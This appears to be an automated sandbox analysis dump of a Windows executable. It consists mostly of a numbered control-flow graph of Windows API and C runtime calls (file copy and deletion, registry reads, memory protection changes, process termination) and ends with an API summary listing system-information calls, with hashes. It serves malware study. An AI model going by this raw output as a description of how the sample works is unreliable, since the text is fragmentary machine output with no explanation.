95797->95798 95799 602af7 95798->95799 95800 5950f5 40 API calls 95799->95800 95801 602b07 95800->95801 95802 5950f5 40 API calls 95801->95802 95803 602b17 95802->95803 96012 603017 GetTempPathW GetTempFileNameW 95803->96012 95805 602b22 95806 5be5eb 29 API calls 95805->95806 95817 602b33 95806->95817 95808 602bf8 95810 602c12 95808->95810 95811 602bfe DeleteFileW 95808->95811 95809 5950f5 40 API calls 95809->95817 95812 602c91 CopyFileW 95810->95812 95813 602c18 95810->95813 95811->95787 95814 602ca7 DeleteFileW 95812->95814 95815 602cb9 DeleteFileW 95812->95815 96042 6022ce 79 API calls 95813->96042 95814->95787 96035 602fd8 CreateFileW 95815->96035 95817->95787 95817->95809 95819 602bed 95817->95819 96013 5bdbb3 95817->96013 96022 5be678 95819->96022 95821 602c7c 95821->95815 95822 602c80 DeleteFileW 95821->95822 95822->95787 95823->95489 95824->95523 95825->95537 95826->95626 95827->95626 95828->95628 95829->95622 95831 594ea8 GetProcAddress 95830->95831 95832 594ec6 95830->95832 95833 594eb8 95831->95833 95835 5be5eb 95832->95835 95833->95832 95834 594ebf FreeLibrary 95833->95834 95834->95832 95866 5be52a 95835->95866 95837 594eea 95837->95643 95837->95644 95839 594e8d 95838->95839 95840 594e6e GetProcAddress 95838->95840 95843 594f80 95839->95843 95841 594e7e 95840->95841 95841->95839 95842 594e86 FreeLibrary 95841->95842 95842->95839 95844 5afe0b 22 API calls 95843->95844 95845 594f95 95844->95845 95846 595722 22 API calls 95845->95846 95847 594fa1 __fread_nolock 95846->95847 95848 5d3d1d 95847->95848 95849 5950a5 95847->95849 95859 594fdc 95847->95859 95938 60304d 74 API calls 95848->95938 95927 5942a2 CreateStreamOnHGlobal 95849->95927 95852 5d3d22 95854 59511f 64 API calls 95852->95854 95853 5950f5 40 API calls 95853->95859 95855 5d3d45 95854->95855 95856 5950f5 40 API calls 95855->95856 95858 59506e ISource 95856->95858 95858->95652 95859->95852 95859->95853 95859->95858 95933 59511f 95859->95933 95861 5d3d70 95860->95861 95862 595107 95860->95862 95960 
5be8c4 95862->95960 95865 6028fe 27 API calls 95865->95659 95867 5be536 __FrameHandler3::FrameUnwindToState 95866->95867 95868 5be544 95867->95868 95871 5be574 95867->95871 95891 5bf2d9 20 API calls __dosmaperr 95868->95891 95870 5be549 95892 5c27ec 26 API calls pre_c_initialization 95870->95892 95873 5be579 95871->95873 95874 5be586 95871->95874 95893 5bf2d9 20 API calls __dosmaperr 95873->95893 95883 5c8061 95874->95883 95877 5be58f 95878 5be5a2 95877->95878 95879 5be595 95877->95879 95895 5be5d4 LeaveCriticalSection __fread_nolock 95878->95895 95894 5bf2d9 20 API calls __dosmaperr 95879->95894 95881 5be554 __fread_nolock 95881->95837 95884 5c806d __FrameHandler3::FrameUnwindToState 95883->95884 95896 5c2f5e EnterCriticalSection 95884->95896 95886 5c807b 95897 5c80fb 95886->95897 95890 5c80ac __fread_nolock 95890->95877 95891->95870 95892->95881 95893->95881 95894->95881 95895->95881 95896->95886 95905 5c811e 95897->95905 95898 5c8088 95911 5c80b7 95898->95911 95899 5c8177 95916 5c4c7d 20 API calls 2 library calls 95899->95916 95902 5c8180 95917 5c29c8 95902->95917 95904 5c8189 95904->95898 95923 5c3405 11 API calls 2 library calls 95904->95923 95905->95898 95905->95899 95905->95905 95914 5b918d EnterCriticalSection 95905->95914 95915 5b91a1 LeaveCriticalSection 95905->95915 95907 5c81a8 95924 5b918d EnterCriticalSection 95907->95924 95910 5c81bb 95910->95898 95926 5c2fa6 LeaveCriticalSection 95911->95926 95913 5c80be 95913->95890 95914->95905 95915->95905 95916->95902 95918 5c29fc _free 95917->95918 95919 5c29d3 RtlFreeHeap 95917->95919 95918->95904 95919->95918 95920 5c29e8 95919->95920 95925 5bf2d9 20 API calls __dosmaperr 95920->95925 95922 5c29ee GetLastError 95922->95918 95923->95907 95924->95910 95925->95922 95926->95913 95928 5942bc FindResourceExW 95927->95928 95932 5942d9 95927->95932 95929 5d35ba LoadResource 95928->95929 95928->95932 95930 5d35cf SizeofResource 95929->95930 95929->95932 95931 5d35e3 LockResource 95930->95931 95930->95932 95931->95932 
95932->95859 95934 59512e 95933->95934 95935 5d3d90 95933->95935 95939 5bece3 95934->95939 95938->95852 95942 5beaaa 95939->95942 95941 59513c 95941->95859 95946 5beab6 __FrameHandler3::FrameUnwindToState 95942->95946 95943 5beac2 95955 5bf2d9 20 API calls __dosmaperr 95943->95955 95945 5beae8 95957 5b918d EnterCriticalSection 95945->95957 95946->95943 95946->95945 95948 5beac7 95956 5c27ec 26 API calls pre_c_initialization 95948->95956 95949 5beaf4 95958 5bec0a 62 API calls 2 library calls 95949->95958 95952 5beb08 95959 5beb27 LeaveCriticalSection __fread_nolock 95952->95959 95954 5bead2 __fread_nolock 95954->95941 95955->95948 95956->95954 95957->95949 95958->95952 95959->95954 95963 5be8e1 95960->95963 95962 595118 95962->95865 95964 5be8ed __FrameHandler3::FrameUnwindToState 95963->95964 95965 5be92d 95964->95965 95966 5be900 ___scrt_fastfail 95964->95966 95967 5be925 __fread_nolock 95964->95967 95978 5b918d EnterCriticalSection 95965->95978 95976 5bf2d9 20 API calls __dosmaperr 95966->95976 95967->95962 95970 5be937 95979 5be6f8 38 API calls 4 library calls 95970->95979 95971 5be91a 95977 5c27ec 26 API calls pre_c_initialization 95971->95977 95974 5be94e 95980 5be96c LeaveCriticalSection __fread_nolock 95974->95980 95976->95971 95977->95967 95978->95970 95979->95974 95980->95967 95982 596d91 95981->95982 95983 596d34 95981->95983 95984 5993b2 22 API calls 95982->95984 95983->95982 95985 596d3f 95983->95985 95991 596d62 __fread_nolock 95984->95991 95986 5d4c9d 95985->95986 95987 596d5a 95985->95987 95988 5afddb 22 API calls 95986->95988 95995 596f34 22 API calls 95987->95995 95990 5d4ca7 95988->95990 95992 5afe0b 22 API calls 95990->95992 95991->95684 95993 5d4cda 95992->95993 95994->95699 95995->95991 95997 5963b6 __fread_nolock 95996->95997 95998 596382 95996->95998 95997->95710 95998->95997 95999 5d4a82 95998->95999 96000 5963a9 95998->96000 96001 5afddb 22 API calls 95999->96001 96002 59a587 22 API calls 96000->96002 96003 5d4a91 96001->96003 96002->95997 
96004 5afe0b 22 API calls 96003->96004 96005 5d4ac5 __fread_nolock 96004->96005 96006->95711 96007->95753 96008->95755 96043 5be4e8 96009->96043 96011 60275d 96011->95775 96012->95805 96014 5bdbc1 96013->96014 96020 5bdbdd 96013->96020 96015 5bdbcd 96014->96015 96016 5bdbe3 96014->96016 96014->96020 96060 5bf2d9 20 API calls __dosmaperr 96015->96060 96057 5bd9cc 96016->96057 96019 5bdbd2 96061 5c27ec 26 API calls pre_c_initialization 96019->96061 96020->95817 96023 5be684 __FrameHandler3::FrameUnwindToState 96022->96023 96024 5be6aa 96023->96024 96025 5be695 96023->96025 96034 5be6a5 __fread_nolock 96024->96034 96217 5b918d EnterCriticalSection 96024->96217 96234 5bf2d9 20 API calls __dosmaperr 96025->96234 96028 5be69a 96235 5c27ec 26 API calls pre_c_initialization 96028->96235 96029 5be6c6 96218 5be602 96029->96218 96032 5be6d1 96236 5be6ee LeaveCriticalSection __fread_nolock 96032->96236 96034->95808 96036 603013 96035->96036 96037 602fff SetFileTime CloseHandle 96035->96037 96036->95787 96037->96036 96038->95782 96039->95788 96040->95796 96041->95796 96042->95821 96046 5be469 96043->96046 96045 5be505 96045->96011 96047 5be478 96046->96047 96048 5be48c 96046->96048 96054 5bf2d9 20 API calls __dosmaperr 96047->96054 96053 5be488 __alldvrm 96048->96053 96056 5c333f 11 API calls 2 library calls 96048->96056 96050 5be47d 96055 5c27ec 26 API calls pre_c_initialization 96050->96055 96053->96045 96054->96050 96055->96053 96056->96053 96062 5bd97b 96057->96062 96059 5bd9f0 96059->96020 96060->96019 96061->96020 96063 5bd987 __FrameHandler3::FrameUnwindToState 96062->96063 96070 5b918d EnterCriticalSection 96063->96070 96065 5bd995 96071 5bd9f4 96065->96071 96069 5bd9b3 __fread_nolock 96069->96059 96070->96065 96079 5c49a1 96071->96079 96077 5bd9a2 96078 5bd9c0 LeaveCriticalSection __fread_nolock 96077->96078 96078->96069 96100 5bd955 96079->96100 96081 5c49b0 96107 5cf89b 96081->96107 96083 5bda09 96088 5bda3a 96083->96088 96084 5c49b6 96084->96083 96116 5c3820 21 API 
calls 2 library calls 96084->96116 96086 5c4a15 96087 5c29c8 _free 20 API calls 96086->96087 96087->96083 96090 5bda4c 96088->96090 96095 5bda24 96088->96095 96089 5bda5a 96147 5bf2d9 20 API calls __dosmaperr 96089->96147 96090->96089 96092 5bda85 __fread_nolock 96090->96092 96090->96095 96092->96095 96097 5bd955 __fread_nolock 26 API calls 96092->96097 96122 5c59be 96092->96122 96149 5bdc0b 96092->96149 96093 5bda5f 96148 5c27ec 26 API calls pre_c_initialization 96093->96148 96099 5c4a56 62 API calls 96095->96099 96097->96092 96099->96077 96101 5bd961 96100->96101 96102 5bd976 96100->96102 96117 5bf2d9 20 API calls __dosmaperr 96101->96117 96102->96081 96104 5bd966 96118 5c27ec 26 API calls pre_c_initialization 96104->96118 96106 5bd971 96106->96081 96108 5cf8a8 96107->96108 96109 5cf8b5 96107->96109 96119 5bf2d9 20 API calls __dosmaperr 96108->96119 96112 5cf8c1 96109->96112 96120 5bf2d9 20 API calls __dosmaperr 96109->96120 96111 5cf8ad 96111->96084 96112->96084 96114 5cf8e2 96121 5c27ec 26 API calls pre_c_initialization 96114->96121 96116->96086 96117->96104 96118->96106 96119->96111 96120->96114 96121->96111 96123 5c59ca __FrameHandler3::FrameUnwindToState 96122->96123 96124 5c59d2 96123->96124 96127 5c59ea 96123->96127 96209 5bf2c6 20 API calls __dosmaperr 96124->96209 96126 5c5a88 96214 5bf2c6 20 API calls __dosmaperr 96126->96214 96127->96126 96132 5c5a1f 96127->96132 96128 5c59d7 96210 5bf2d9 20 API calls __dosmaperr 96128->96210 96131 5c5a8d 96215 5bf2d9 20 API calls __dosmaperr 96131->96215 96155 5c5147 EnterCriticalSection 96132->96155 96135 5c5a95 96216 5c27ec 26 API calls pre_c_initialization 96135->96216 96136 5c5a25 96138 5c5a56 96136->96138 96139 5c5a41 96136->96139 96156 5c5aa9 96138->96156 96211 5bf2d9 20 API calls __dosmaperr 96139->96211 96141 5c59df __fread_nolock 96141->96092 96143 5c5a46 96212 5bf2c6 20 API calls __dosmaperr 96143->96212 96144 5c5a51 96213 5c5a80 LeaveCriticalSection __wsopen_s 96144->96213 96147->96093 96148->96095 96150 
5bdc1f 96149->96150 96151 5bdc23 96149->96151 96150->96092 96151->96150 96152 5bd955 __fread_nolock 26 API calls 96151->96152 96153 5bdc43 96152->96153 96154 5c59be __wsopen_s 62 API calls 96153->96154 96154->96150 96155->96136 96157 5c5ad7 96156->96157 96204 5c5ad0 96156->96204 96158 5c5afa 96157->96158 96159 5c5adb 96157->96159 96163 5c5b4b 96158->96163 96164 5c5b2e 96158->96164 96160 5bf2c6 __dosmaperr 20 API calls 96159->96160 96162 5c5ae0 96160->96162 96161 5b0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 96165 5c5cb1 96161->96165 96166 5bf2d9 _free 20 API calls 96162->96166 96167 5c5b61 96163->96167 96170 5c9424 __wsopen_s 28 API calls 96163->96170 96168 5bf2c6 __dosmaperr 20 API calls 96164->96168 96165->96144 96169 5c5ae7 96166->96169 96171 5c564e __wsopen_s 39 API calls 96167->96171 96172 5c5b33 96168->96172 96173 5c27ec pre_c_initialization 26 API calls 96169->96173 96170->96167 96174 5c5b6a 96171->96174 96175 5bf2d9 _free 20 API calls 96172->96175 96173->96204 96176 5c5b6f 96174->96176 96177 5c5ba8 96174->96177 96178 5c5b3b 96175->96178 96181 5c5b95 96176->96181 96182 5c5b73 96176->96182 96179 5c5bbc 96177->96179 96180 5c5c02 WriteFile 96177->96180 96183 5c27ec pre_c_initialization 26 API calls 96178->96183 96184 5c5bc4 96179->96184 96185 5c5bf2 96179->96185 96186 5c5c25 GetLastError 96180->96186 96193 5c5b8b 96180->96193 96187 5c542e __wsopen_s 45 API calls 96181->96187 96190 5c55e1 __wsopen_s GetLastError WriteConsoleW CreateFileW 96182->96190 96192 5c5c69 96182->96192 96183->96204 96188 5c5bc9 96184->96188 96189 5c5be2 96184->96189 96191 5c56c4 __wsopen_s 7 API calls 96185->96191 96186->96193 96187->96193 96188->96192 96195 5c5bd2 96188->96195 96196 5c5891 __wsopen_s 8 API calls 96189->96196 96190->96193 96197 5c5be0 96191->96197 96194 5bf2d9 _free 20 API calls 96192->96194 96192->96204 96193->96192 96199 5c5c45 96193->96199 96193->96204 96198 5c5c8e 96194->96198 
96200 5c57a3 __wsopen_s 7 API calls 96195->96200 96196->96197 96197->96193 96201 5bf2c6 __dosmaperr 20 API calls 96198->96201 96202 5c5c4c 96199->96202 96203 5c5c60 96199->96203 96200->96197 96201->96204 96205 5bf2d9 _free 20 API calls 96202->96205 96206 5bf2a3 __dosmaperr 20 API calls 96203->96206 96204->96161 96207 5c5c51 96205->96207 96206->96204 96208 5bf2c6 __dosmaperr 20 API calls 96207->96208 96208->96204 96209->96128 96210->96141 96211->96143 96212->96144 96213->96141 96214->96131 96215->96135 96216->96141 96217->96029 96219 5be60f 96218->96219 96220 5be624 96218->96220 96256 5bf2d9 20 API calls __dosmaperr 96219->96256 96223 5bdc0b 62 API calls 96220->96223 96232 5be61f 96220->96232 96222 5be614 96257 5c27ec 26 API calls pre_c_initialization 96222->96257 96225 5be638 96223->96225 96237 5c4d7a 96225->96237 96228 5bd955 __fread_nolock 26 API calls 96229 5be646 96228->96229 96241 5c862f 96229->96241 96232->96032 96233 5c29c8 _free 20 API calls 96233->96232 96234->96028 96235->96034 96236->96034 96238 5be640 96237->96238 96239 5c4d90 96237->96239 96238->96228 96239->96238 96240 5c29c8 _free 20 API calls 96239->96240 96240->96238 96242 5c863e 96241->96242 96243 5c8653 96241->96243 96261 5bf2c6 20 API calls __dosmaperr 96242->96261 96245 5c868e 96243->96245 96249 5c867a 96243->96249 96263 5bf2c6 20 API calls __dosmaperr 96245->96263 96246 5c8643 96262 5bf2d9 20 API calls __dosmaperr 96246->96262 96258 5c8607 96249->96258 96250 5c8693 96264 5bf2d9 20 API calls __dosmaperr 96250->96264 96253 5c869b 96265 5c27ec 26 API calls pre_c_initialization 96253->96265 96255 5be64c 96255->96232 96255->96233 96256->96222 96257->96232 96266 5c8585 96258->96266 96260 5c862b 96260->96255 96261->96246 96262->96255 96263->96250 96264->96253 96265->96255 96267 5c8591 __FrameHandler3::FrameUnwindToState 96266->96267 96277 5c5147 EnterCriticalSection 96267->96277 96269 5c859f 96270 5c85c6 96269->96270 96271 5c85d1 96269->96271 96278 5c86ae 96270->96278 96293 5bf2d9 20 API calls 
__dosmaperr 96271->96293 96274 5c85cc 96294 5c85fb LeaveCriticalSection __wsopen_s 96274->96294 96276 5c85ee __fread_nolock 96276->96260 96277->96269 96295 5c53c4 96278->96295 96280 5c86c4 96308 5c5333 21 API calls 3 library calls 96280->96308 96281 5c86be 96281->96280 96283 5c86f6 96281->96283 96286 5c53c4 __wsopen_s 26 API calls 96281->96286 96283->96280 96284 5c53c4 __wsopen_s 26 API calls 96283->96284 96287 5c8702 CloseHandle 96284->96287 96285 5c871c 96288 5c873e 96285->96288 96309 5bf2a3 20 API calls 2 library calls 96285->96309 96289 5c86ed 96286->96289 96287->96280 96290 5c870e GetLastError 96287->96290 96288->96274 96292 5c53c4 __wsopen_s 26 API calls 96289->96292 96290->96280 96292->96283 96293->96274 96294->96276 96296 5c53e6 96295->96296 96297 5c53d1 96295->96297 96299 5bf2c6 __dosmaperr 20 API calls 96296->96299 96301 5c540b 96296->96301 96298 5bf2c6 __dosmaperr 20 API calls 96297->96298 96300 5c53d6 96298->96300 96302 5c5416 96299->96302 96303 5bf2d9 _free 20 API calls 96300->96303 96301->96281 96305 5bf2d9 _free 20 API calls 96302->96305 96304 5c53de 96303->96304 96304->96281 96306 5c541e 96305->96306 96307 5c27ec pre_c_initialization 26 API calls 96306->96307 96307->96304 96308->96285 96309->96288 96339 596270 96310->96339 96312 599fd2 96345 59a4a1 96312->96345 96314 599fec 96314->95574 96317 5df7c4 96357 5f96e2 84 API calls __wsopen_s 96317->96357 96318 5df699 96326 5afddb 22 API calls 96318->96326 96319 59a405 96319->96314 96358 5f96e2 84 API calls __wsopen_s 96319->96358 96321 59a4a1 22 API calls 96337 599eb5 96321->96337 96324 59a6c3 22 API calls 96324->96337 96325 5df7d2 96327 59a4a1 22 API calls 96325->96327 96328 5df754 96326->96328 96329 5df7e8 96327->96329 96330 5afe0b 22 API calls 96328->96330 96329->96314 96331 59a12c __fread_nolock 96330->96331 96331->96317 96331->96319 96333 59a587 22 API calls 96333->96337 96334 59aec9 22 API calls 96335 59a0db CharUpperBuffW 96334->96335 96353 59a673 22 API calls 96335->96353 96337->96312 96337->96317 
96337->96318 96337->96319 96337->96321 96337->96324 96337->96331 96337->96333 96337->96334 96344 594573 41 API calls _wcslen 96337->96344 96354 5948c8 23 API calls 96337->96354 96355 5949bd 22 API calls __fread_nolock 96337->96355 96356 59a673 22 API calls 96337->96356 96338->95578 96340 5afe0b 22 API calls 96339->96340 96341 596295 96340->96341 96342 5afddb 22 API calls 96341->96342 96343 5962a3 96342->96343 96343->96337 96344->96337 96346 59a52b 96345->96346 96352 59a4b1 __fread_nolock 96345->96352 96349 5afe0b 22 API calls 96346->96349 96347 5afddb 22 API calls 96348 59a4b8 96347->96348 96350 59a4d6 96348->96350 96351 5afddb 22 API calls 96348->96351 96349->96352 96350->96314 96351->96350 96352->96347 96353->96337 96354->96337 96355->96337 96356->96337 96357->96325 96358->96314 96360 600f7e 96359->96360 96375 601097 96359->96375 96361 600fcb 96360->96361 96362 600f9e 96360->96362 96364 600fe2 96360->96364 96363 5afe0b 22 API calls 96361->96363 96362->96361 96366 600fb2 96362->96366 96370 600fc0 __fread_nolock 96363->96370 96367 5afe0b 22 API calls 96364->96367 96376 600fff 96364->96376 96365 601026 96369 5afe0b 22 API calls 96365->96369 96368 5afe0b 22 API calls 96366->96368 96367->96376 96368->96370 96371 60102c 96369->96371 96372 5afddb 22 API calls 96370->96372 96378 5af1d8 22 API calls 96371->96378 96372->96375 96374 601038 96379 5af6c9 24 API calls 96374->96379 96375->95580 96376->96365 96376->96366 96376->96370 96378->96374 96379->96370 96381 597510 53 API calls 96380->96381 96382 617f90 96381->96382 96406 617fd5 ISource 96382->96406 96418 618cd3 96382->96418 96384 618281 96385 61844f 96384->96385 96390 61828f 96384->96390 96459 618ee4 60 API calls 96385->96459 96388 61845e 96388->96390 96391 61846a 96388->96391 96389 597510 53 API calls 96408 618049 96389->96408 96431 617e86 96390->96431 96391->96406 96396 6182c8 96446 5afc70 96396->96446 96399 618302 96453 5963eb 22 API calls 96399->96453 96400 6182e8 96452 60359c 82 API calls __wsopen_s 96400->96452 
96403 6182f3 GetCurrentProcess TerminateProcess 96403->96399 96404 618311 96454 596a50 22 API calls 96404->96454 96406->95585 96407 61832a 96416 618352 96407->96416 96455 5a04f0 22 API calls 96407->96455 96408->96384 96408->96389 96408->96406 96450 5f417d 22 API calls __fread_nolock 96408->96450 96451 61851d 42 API calls _strftime 96408->96451 96409 6184c5 96409->96406 96414 6184d9 FreeLibrary 96409->96414 96411 618341 96456 618b7b 75 API calls 96411->96456 96414->96406 96416->96409 96457 5a04f0 22 API calls 96416->96457 96458 59aceb 23 API calls ISource 96416->96458 96460 618b7b 75 API calls 96416->96460 96419 59aec9 22 API calls 96418->96419 96420 618cee CharLowerBuffW 96419->96420 96461 5f8e54 96420->96461 96424 59a961 22 API calls 96425 618d2a 96424->96425 96426 596d25 22 API calls 96425->96426 96427 618d3e 96426->96427 96428 5993b2 22 API calls 96427->96428 96430 618d48 _wcslen 96428->96430 96429 618e5e _wcslen 96429->96408 96430->96429 96468 61851d 42 API calls _strftime 96430->96468 96432 617ea1 96431->96432 96433 617eec 96431->96433 96434 5afe0b 22 API calls 96432->96434 96437 619096 96433->96437 96435 617ec3 96434->96435 96435->96433 96436 5afddb 22 API calls 96435->96436 96436->96435 96438 6192ab ISource 96437->96438 96445 6190ba _strcat _wcslen 96437->96445 96438->96396 96439 59b6b5 39 API calls 96439->96445 96440 59b567 39 API calls 96440->96445 96441 59b38f 39 API calls 96441->96445 96442 597510 53 API calls 96442->96445 96443 5bea0c 21 API calls ___std_exception_copy 96443->96445 96445->96438 96445->96439 96445->96440 96445->96441 96445->96442 96445->96443 96471 5fefae 24 API calls _wcslen 96445->96471 96448 5afc85 96446->96448 96447 5afd1d VirtualProtect 96449 5afceb 96447->96449 96448->96447 96448->96449 96449->96399 96449->96400 96450->96408 96451->96408 96452->96403 96453->96404 96454->96407 96455->96411 96456->96416 96457->96416 96458->96416 96459->96388 96460->96416 96462 5f8e74 _wcslen 96461->96462 96463 5f8f63 96462->96463 96465 5f8f68 
96462->96465 96466 5f8ea9 96462->96466 96463->96424 96463->96430 96465->96463 96470 5ace60 41 API calls 96465->96470 96466->96463 96469 5ace60 41 API calls 96466->96469 96468->96429 96469->96466 96470->96465 96471->96445 96472 5a0b9d 96473 5a0ba6 __fread_nolock 96472->96473 96474 597510 53 API calls 96473->96474 96475 5e5cb8 96473->96475 96478 5a0bf7 96473->96478 96479 5afddb 22 API calls 96473->96479 96482 5a0847 __fread_nolock 96473->96482 96483 5afe0b 22 API calls 96473->96483 96474->96473 96484 594a88 22 API calls __fread_nolock 96475->96484 96477 5e5cc4 96481 59a8c7 22 API calls 96477->96481 96477->96482 96480 59a587 22 API calls 96478->96480 96479->96473 96480->96482 96481->96482 96483->96473 96484->96477 96485 591033 96490 594c91 96485->96490 96489 591042 96491 59a961 22 API calls 96490->96491 96492 594cff 96491->96492 96498 593af0 96492->96498 96495 594d9c 96496 591038 96495->96496 96501 5951f7 22 API calls __fread_nolock 96495->96501 96497 5b00a3 29 API calls __onexit 96496->96497 96497->96489 96502 593b1c 96498->96502 96501->96495 96503 593b29 96502->96503 96504 593b0f 96502->96504 96503->96504 96505 593b30 RegOpenKeyExW 96503->96505 96504->96495 96505->96504 96506 593b4a RegQueryValueExW 96505->96506 96507 593b6b 96506->96507 96508 593b80 RegCloseKey 96506->96508 96507->96508 96508->96504 96509 5e3f75 96520 5aceb1 96509->96520 96511 5e3f8b 96513 5e4006 96511->96513 96587 5ae300 23 API calls 96511->96587 96529 59bf40 96513->96529 96516 5e4052 96518 5e4a88 96516->96518 96589 60359c 82 API calls __wsopen_s 96516->96589 96517 5e3fe6 96517->96516 96588 601abf 22 API calls 96517->96588 96521 5acebf 96520->96521 96522 5aced2 96520->96522 96590 59aceb 23 API calls ISource 96521->96590 96524 5aced7 96522->96524 96525 5acf05 96522->96525 96527 5afddb 22 API calls 96524->96527 96591 59aceb 23 API calls ISource 96525->96591 96528 5acec9 96527->96528 96528->96511 96592 59adf0 96529->96592 96531 59bf9d 96532 59bfa9 96531->96532 96533 5e04b6 96531->96533 96534 5e04c6 
96532->96534 96535 59c01e 96532->96535 96611 60359c 82 API calls __wsopen_s 96533->96611 96612 60359c 82 API calls __wsopen_s 96534->96612 96597 59ac91 96535->96597 96539 5f7120 22 API calls 96584 59c039 ISource __fread_nolock 96539->96584 96540 59c7da 96544 5afe0b 22 API calls 96540->96544 96549 59c808 __fread_nolock 96544->96549 96546 5e04f5 96550 5e055a 96546->96550 96613 5ad217 235 API calls 96546->96613 96553 5afe0b 22 API calls 96549->96553 96573 59c603 96550->96573 96614 60359c 82 API calls __wsopen_s 96550->96614 96551 59af8a 22 API calls 96551->96584 96552 5e091a 96624 603209 23 API calls 96552->96624 96585 59c350 ISource __fread_nolock 96553->96585 96554 5afddb 22 API calls 96554->96584 96557 59ec40 235 API calls 96557->96584 96558 5e08a5 96559 59ec40 235 API calls 96558->96559 96561 5e08cf 96559->96561 96561->96573 96622 59a81b 41 API calls 96561->96622 96562 5e0591 96615 60359c 82 API calls __wsopen_s 96562->96615 96563 5e08f6 96623 60359c 82 API calls __wsopen_s 96563->96623 96569 59c237 96570 59c253 96569->96570 96572 59a8c7 22 API calls 96569->96572 96574 5e0976 96570->96574 96578 59c297 ISource 96570->96578 96571 5afe0b 22 API calls 96571->96584 96572->96570 96573->96516 96625 59aceb 23 API calls ISource 96574->96625 96577 5e09bf 96577->96573 96626 60359c 82 API calls __wsopen_s 96577->96626 96578->96577 96608 59aceb 23 API calls ISource 96578->96608 96580 59c335 96580->96577 96581 59c342 96580->96581 96609 59a704 22 API calls ISource 96581->96609 96582 59bbe0 40 API calls 96582->96584 96584->96539 96584->96540 96584->96546 96584->96549 96584->96550 96584->96551 96584->96552 96584->96554 96584->96557 96584->96558 96584->96562 96584->96563 96584->96569 96584->96571 96584->96573 96584->96577 96584->96582 96601 59ad81 96584->96601 96616 5f7099 22 API calls __fread_nolock 96584->96616 96617 615745 54 API calls _wcslen 96584->96617 96618 5aaa42 22 API calls ISource 96584->96618 96619 5ff05c 40 API calls 96584->96619 96620 59a993 41 API calls 96584->96620 
96621 59aceb 23 API calls ISource 96584->96621 96586 59c3ac 96585->96586 96610 5ace17 22 API calls ISource 96585->96610 96586->96516 96587->96517 96588->96513 96589->96518 96590->96528 96591->96528 96593 59ae01 96592->96593 96596 59ae1c ISource 96592->96596 96594 59aec9 22 API calls 96593->96594 96595 59ae09 CharUpperBuffW 96594->96595 96595->96596 96596->96531 96598 59acae 96597->96598 96599 59acd1 96598->96599 96627 60359c 82 API calls __wsopen_s 96598->96627 96599->96584 96602 5dfadb 96601->96602 96603 59ad92 96601->96603 96604 5afddb 22 API calls 96603->96604 96605 59ad99 96604->96605 96628 59adcd 96605->96628 96608->96580 96609->96585 96610->96585 96611->96534 96612->96573 96613->96550 96614->96573 96615->96573 96616->96584 96617->96584 96618->96584 96619->96584 96620->96584 96621->96584 96622->96563 96623->96573 96624->96569 96625->96577 96626->96573 96627->96599 96632 59addd 96628->96632 96629 59adb6 96629->96584 96630 5afddb 22 API calls 96630->96632 96631 59a961 22 API calls 96631->96632 96632->96629 96632->96630 96632->96631 96633 59a8c7 22 API calls 96632->96633 96634 59adcd 22 API calls 96632->96634 96633->96632 96634->96632 96635 592e37 96636 59a961 22 API calls 96635->96636 96637 592e4d 96636->96637 96714 594ae3 96637->96714 96639 592e6b 96640 593a5a 24 API calls 96639->96640 96641 592e7f 96640->96641 96642 599cb3 22 API calls 96641->96642 96643 592e8c 96642->96643 96644 594ecb 94 API calls 96643->96644 96645 592ea5 96644->96645 96646 592ead 96645->96646 96647 5d2cb0 96645->96647 96650 59a8c7 22 API calls 96646->96650 96744 602cf9 96647->96744 96649 5d2cc3 96651 5d2ccf 96649->96651 96653 594f39 68 API calls 96649->96653 96652 592ec3 96650->96652 96655 594f39 68 API calls 96651->96655 96728 596f88 22 API calls 96652->96728 96653->96651 96657 5d2ce5 96655->96657 96656 592ecf 96658 599cb3 22 API calls 96656->96658 96770 593084 22 API calls 96657->96770 96659 592edc 96658->96659 96729 59a81b 41 API calls 96659->96729 96662 592eec 96664 599cb3 22 API calls 

                                                  Control-flow Graph (graph image and raw edge list omitted)
                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 0059430D
                                                    • Part of subcall function 00596B57: _wcslen.LIBCMT ref: 00596B6A
                                                  • GetCurrentProcess.KERNEL32(?,0062CB64,00000000,?,?), ref: 00594422
                                                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 00594429
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00594454
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00594466
                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00594474
                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0059447B
                                                  • GetSystemInfo.KERNEL32(?,?,?), ref: 005944A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                  • API String ID: 3290436268-3101561225
                                                  • Opcode ID: e37a80c56538e5e1b5326a6383199c12c19e108e699956209b4491270ed31606
                                                  • Instruction ID: 59cfebe527b089dd151a32da9f4bd61475b013321412b9b81f2c241b707ef354
                                                  • Opcode Fuzzy Hash: e37a80c56538e5e1b5326a6383199c12c19e108e699956209b4491270ed31606
                                                  • Instruction Fuzzy Hash: DBA1846590A6D0DFCF21CB6D7D455997FA77B37300B0C789AD047BBB22D2A04A09CB62

                                                  Control-flow Graph (graph image and raw edge list omitted)
                                                  APIs
